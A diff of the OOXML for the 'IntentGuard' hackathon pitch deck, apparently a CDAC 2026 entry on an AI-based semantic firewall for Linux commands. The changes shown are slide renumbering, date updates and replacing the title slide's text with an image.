--- a/docs/IntentGuard-CDAC-Deck_2026.pptx
+++ b/docs/IntentGuard-CDAC-Deck_2026.pptx
@@ -9,21 +9,22 @@
     <p:sldId id="257" r:id="rId3"/>
     <p:sldId id="258" r:id="rId4"/>
     <p:sldId id="259" r:id="rId5"/>
-    <p:sldId id="260" r:id="rId6"/>
-    <p:sldId id="261" r:id="rId7"/>
-    <p:sldId id="262" r:id="rId8"/>
-    <p:sldId id="263" r:id="rId9"/>
-    <p:sldId id="264" r:id="rId10"/>
-    <p:sldId id="265" r:id="rId11"/>
-    <p:sldId id="266" r:id="rId12"/>
-    <p:sldId id="267" r:id="rId13"/>
-    <p:sldId id="268" r:id="rId14"/>
-    <p:sldId id="269" r:id="rId15"/>
-    <p:sldId id="270" r:id="rId16"/>
-    <p:sldId id="271" r:id="rId17"/>
-    <p:sldId id="272" r:id="rId18"/>
-    <p:sldId id="273" r:id="rId19"/>
-    <p:sldId id="274" r:id="rId20"/>
+    <p:sldId id="275" r:id="rId6"/>
+    <p:sldId id="260" r:id="rId7"/>
+    <p:sldId id="261" r:id="rId8"/>
+    <p:sldId id="262" r:id="rId9"/>
+    <p:sldId id="263" r:id="rId10"/>
+    <p:sldId id="264" r:id="rId11"/>
+    <p:sldId id="265" r:id="rId12"/>
+    <p:sldId id="266" r:id="rId13"/>
+    <p:sldId id="267" r:id="rId14"/>
+    <p:sldId id="268" r:id="rId15"/>
+    <p:sldId id="269" r:id="rId16"/>
+    <p:sldId id="270" r:id="rId17"/>
+    <p:sldId id="271" r:id="rId18"/>
+    <p:sldId id="272" r:id="rId19"/>
+    <p:sldId id="273" r:id="rId20"/>
+    <p:sldId id="274" r:id="rId21"/>
   </p:sldIdLst>
   <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
   <p:notesSz cx="6858000" cy="9144000"/>
@@ -320,7 +321,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -488,7 +489,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -666,7 +667,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -834,7 +835,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1079,7 +1080,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1364,7 +1365,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1783,7 +1784,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1900,7 +1901,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -1995,7 +1996,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2270,7 +2271,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2522,7 +2523,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -2733,7 +2734,7 @@
           <a:p>
             <a:fld id="{5BCAD085-E8A6-8845-BD4E-CB4CCA059FC4}" type="datetimeFigureOut">
               <a:rPr lang="en-US" smtClean="0"/>
-              <a:t>8/24/26</a:t>
+              <a:t>9/1/26</a:t>
             </a:fld>
             <a:endParaRPr lang="en-US"/>
           </a:p>
@@ -3193,7 +3194,7 @@
     <p:bg>
       <p:bgPr>
         <a:solidFill>
-          <a:srgbClr val="0F0F1A"/>
+          <a:schemeClr val="bg1"/>
         </a:solidFill>
         <a:effectLst/>
       </p:bgPr>
@@ -3214,154 +3215,190 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="2" name="TextBox 1"/>
-          <p:cNvSpPr txBox="1"/>
+          <p:cNvPr id="16" name="Rectangle 15">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr bwMode="white">
+          <a:xfrm>
+            <a:off x="1143" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle>
+            <a:defPPr>
+              <a:defRPr lang="en-US"/>
+            </a:defPPr>
+            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="7" name="Picture 6">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8B8DD65-62D6-B26C-21E6-8FB78ADE5A98}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
           <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="914400"/>
-            <a:ext cx="7680960" cy="365760"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="1200" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="707088"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>CDAC HACKATHON 2026  •  CYBERSECURITY / TRUSTED AI</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="3" name="TextBox 2"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="1463040"/>
-            <a:ext cx="7680960" cy="914400"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="4800" b="1">
-                <a:solidFill>
-                  <a:srgbClr val="F8F8F8"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>IntentGuard</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="4" name="TextBox 3"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="2560320"/>
-            <a:ext cx="7680960" cy="548640"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="2000" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="00D4AA"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:t>AI-Powered Semantic Firewall for the Linux Command Layer</a:t>
-            </a:r>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="5" name="TextBox 4"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="731520" y="3840480"/>
-            <a:ext cx="7680960" cy="307777"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr wrap="square">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr algn="ctr">
-              <a:defRPr sz="1400" b="0">
-                <a:solidFill>
-                  <a:srgbClr val="B0B0C0"/>
-                </a:solidFill>
-                <a:latin typeface="Helvetica Neue"/>
-              </a:defRPr>
-            </a:pPr>
-            <a:r>
-              <a:rPr dirty="0"/>
-              <a:t>Rachit Gupta  | </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t>Praveen Chandra</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:srcRect r="8874" b="2"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="20" y="961"/>
+            <a:ext cx="9143980" cy="5142539"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
     </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
@@ -3397,7 +3434,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="14" name="Rectangle 13">
+          <p:cNvPr id="20" name="Rectangle 19">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
@@ -3552,10 +3589,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="9" name="Picture 8">
+          <p:cNvPr id="7" name="Picture 6">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E145A68F-3BAD-2F1F-BB5C-5D29275304B8}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0386FB2D-9D67-0B72-B621-522F43E61313}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3616,7 +3653,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="24" name="Rectangle 23">
+          <p:cNvPr id="14" name="Rectangle 13">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
@@ -3771,10 +3808,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="13" name="Picture 12">
+          <p:cNvPr id="9" name="Picture 8">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA2DE91-30BA-9357-2466-D595623D8C1E}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E145A68F-3BAD-2F1F-BB5C-5D29275304B8}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3785,14 +3822,15 @@
         </p:nvPicPr>
         <p:blipFill>
           <a:blip r:embed="rId2"/>
+          <a:srcRect b="900"/>
           <a:stretch>
             <a:fillRect/>
           </a:stretch>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="0" y="0"/>
-            <a:ext cx="9142857" cy="5143500"/>
+            <a:off x="20" y="961"/>
+            <a:ext cx="9143980" cy="5142539"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -3834,7 +3872,7 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
-          <p:cNvPr id="17" name="Rectangle 16">
+          <p:cNvPr id="24" name="Rectangle 23">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                 <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
@@ -3989,10 +4027,10 @@
       </p:sp>
       <p:pic>
         <p:nvPicPr>
-          <p:cNvPr id="12" name="Picture 11">
+          <p:cNvPr id="13" name="Picture 12">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39C4312-66F0-2DAB-5B29-4D60668E8BFD}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EA2DE91-30BA-9357-2466-D595623D8C1E}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -4003,15 +4041,14 @@
         </p:nvPicPr>
         <p:blipFill>
           <a:blip r:embed="rId2"/>
-          <a:srcRect r="2649"/>
           <a:stretch>
             <a:fillRect/>
           </a:stretch>
         </p:blipFill>
         <p:spPr>
           <a:xfrm>
-            <a:off x="20" y="961"/>
-            <a:ext cx="9143980" cy="5142539"/>
+            <a:off x="0" y="0"/>
+            <a:ext cx="9142857" cy="5143500"/>
           </a:xfrm>
           <a:prstGeom prst="rect">
             <a:avLst/>
@@ -4053,6 +4090,225 @@
       </p:grpSpPr>
       <p:sp>
         <p:nvSpPr>
+          <p:cNvPr id="17" name="Rectangle 16">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A4FC2C-047E-45A5-965D-8E1E3BF09BC6}"/>
+              </a:ext>
+              <a:ext uri="{C183D7F6-B498-43B3-948B-1728B52AA6E4}">
+                <adec:decorative xmlns:adec="http://schemas.microsoft.com/office/drawing/2017/decorative" val="1"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noMove="1" noResize="1" noEditPoints="1" noAdjustHandles="1" noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:extLst>
+              <p:ext uri="{386F3935-93C4-4BCD-93E2-E3B085C9AB24}">
+                <p16:designElem xmlns:p16="http://schemas.microsoft.com/office/powerpoint/2015/main" val="1"/>
+              </p:ext>
+            </p:extLst>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr bwMode="white">
+          <a:xfrm>
+            <a:off x="1143" y="0"/>
+            <a:ext cx="9141714" cy="5143500"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+        <p:style>
+          <a:lnRef idx="2">
+            <a:schemeClr val="accent1">
+              <a:shade val="50000"/>
+            </a:schemeClr>
+          </a:lnRef>
+          <a:fillRef idx="1">
+            <a:schemeClr val="accent1"/>
+          </a:fillRef>
+          <a:effectRef idx="0">
+            <a:schemeClr val="accent1"/>
+          </a:effectRef>
+          <a:fontRef idx="minor">
+            <a:schemeClr val="lt1"/>
+          </a:fontRef>
+        </p:style>
+        <p:txBody>
+          <a:bodyPr rtlCol="0" anchor="ctr"/>
+          <a:lstStyle>
+            <a:defPPr>
+              <a:defRPr lang="en-US"/>
+            </a:defPPr>
+            <a:lvl1pPr marL="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl1pPr>
+            <a:lvl2pPr marL="457200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl2pPr>
+            <a:lvl3pPr marL="914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl3pPr>
+            <a:lvl4pPr marL="1371600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl4pPr>
+            <a:lvl5pPr marL="1828800" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl5pPr>
+            <a:lvl6pPr marL="2286000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl6pPr>
+            <a:lvl7pPr marL="2743200" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl7pPr>
+            <a:lvl8pPr marL="3200400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl8pPr>
+            <a:lvl9pPr marL="3657600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
+              <a:defRPr sz="1800" kern="1200">
+                <a:solidFill>
+                  <a:schemeClr val="lt1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:defRPr>
+            </a:lvl9pPr>
+          </a:lstStyle>
+          <a:p>
+            <a:pPr algn="ctr"/>
+            <a:endParaRPr lang="en-US"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="12" name="Picture 11">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39C4312-66F0-2DAB-5B29-4D60668E8BFD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr>
+            <a:picLocks noChangeAspect="1"/>
+          </p:cNvPicPr>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId2"/>
+          <a:srcRect r="2649"/>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="20" y="961"/>
+            <a:ext cx="9143980" cy="5142539"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+      </p:pic>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide14.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:bg>
+      <p:bgPr>
